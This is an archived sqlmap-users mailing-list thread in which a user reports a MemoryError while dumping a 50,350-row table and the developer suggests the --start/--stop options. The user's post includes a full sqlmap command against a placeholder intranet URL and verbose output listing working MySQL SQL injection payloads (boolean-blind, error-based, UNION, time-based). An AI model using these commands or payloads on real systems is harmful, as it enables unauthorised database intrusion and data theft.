Re: [sqlmap-users] Memory problems
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Memory problems
|
From: Miroslav S. <mir...@gm...> - 2011-01-27 20:04:19
|
in the mean time you can try to use these: --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve kr On Thu, Jan 27, 2011 at 8:55 PM, Miroslav Stampar <mir...@gm...> wrote: > http://mail.python.org/pipermail/mailman-users/2005-October/047436.html > > "A MemoryError exception is a built-in Python exception "Raised when an > operation runs out of memory but the situation may still be rescued > (by deleting some objects)." > > How many members does this list have? According to the FAQ, the largest > list reported to date has 147,000 members and presumably works. > Possibly something in the cPanel implementation or your particular > installation limits this to a greater degree." > > now, this messes our concept a bit but we'll try to adapt. > > kr > > On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar > <mir...@gm...> wrote: >> LOL (50,350 entries in the table and 48 columns) >> >> we'll try to make some tests regarding this and report accordingly. >> haven't planed this kind of "huge" data retrievals :) >> >> kr >> >> On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote: >>> # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" >>> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 >>> -D nomes -T class --dump >>> >>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool >>> http://sqlmap.sourceforge.net >>> >>> [*] starting at: 16:58:05 >>> >>> [16:58:05] [DEBUG] cleaning up configuration parameters >>> [16:58:05] [DEBUG] setting the HTTP timeout >>> [16:58:05] [DEBUG] setting the HTTP Cookie header >>> [16:58:05] [DEBUG] setting the HTTP method to POST >>> [16:58:05] [DEBUG] creating HTTP requests opener object >>> [16:58:05] [INFO] using >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file >>> [16:58:05] [INFO] resuming injection data from session file >>> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file >>> [16:58:05] [INFO] testing connection to the target url >>> you provided an HTTP Cookie header value. The target url provided its own >>> Cookie within the HTTP Set-Cookie header. Do you want to continue using the >>> HTTP Cookie values that you provided? [Y/n] >>> sqlmap identified the following injection points with a total of 0 HTTP(s) >>> requests: >>> --- >>> Place: POST >>> Parameter: vulnparam >>> Type: boolean-based blind >>> Title: AND boolean-based blind - WHERE or HAVING clause >>> Payload: vulnparam=6 AND 5647=5647 >>> >>> Type: error-based >>> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause >>> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT >>> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 >>> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM >>> information_schema.tables GROUP BY x)a) >>> >>> Type: UNION query >>> Title: MySQL UNION query (NULL) - 4 to 7 columns >>> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, >>> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), >>> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# >>> >>> Type: AND/OR time-based blind >>> Title: MySQL > 5.0.11 AND time-based blind >>> Payload: vulnparam=6 AND SLEEP(5) >>> --- >>> >>> [16:58:06] [INFO] the back-end DBMS is MySQL >>> >>> web application technology: PHP 5.3.2 >>> back-end DBMS: MySQL 5.0 >>> [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes' >>> [16:58:06] [INFO] read from file >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns >>> [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes' >>> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, >>> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM >>> nomes.class# >>> [17:00:09] [DEBUG] performed 1 queries in 122 seconds >>> >>> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run >>> with the latest development version from the Subversion repository. If the >>> exception persists, please send by e-mail to >>> sql...@li... the command line, the following text and >>> any information needed to reproduce the bug. The developers will try to >>> reproduce the bug, fix it accordingly and get back to you. >>> sqlmap version: 0.9-dev >>> Python version: 2.6.5 >>> Operating system: posix >>> Traceback (most recent call last): >>> File "./sqlmap.py", line 83, in main >>> start() >>> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in >>> start >>> action() >>> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action >>> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) >>> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in >>> dumpTable >>> entries = inject.getValue(query, blind=False, dump=True) >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue >>> value = __goInband(query, expected, sort, resumeValue, unpack, dump) >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband >>> data = parseUnionPage(output, expression, partial, None, sort) >>> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in >>> parseUnionPage >>> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, >>> kb.injection.place, conf.parameters[kb.injection.place], expression, >>> logOutput)) >>> MemoryError >>> >>> [*] shutting down at: 17:00:13 >>> >>> There are about 50,350 entries in the table and 48 columns.I tested the >>> query manually, and returned a page with 600k of information.I think that >>> sqlmap did not support the amount of data...? >>> >>> David >>> >>> ------------------------------------------------------------------------------ >>> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! >>> Finally, a world-class log management solution at an even better price-free! >>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires >>> February 28th, so secure your free ArcSight Logger TODAY! >>> http://p.sf.net/sfu/arcsight-sfd2d >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> >> -- >> Miroslav Stampar >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> Mobile: +385921010204 (HR 0921010204) >> PGP Key ID: 0xB5397B1B >> Location: Zagreb, Croatia >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
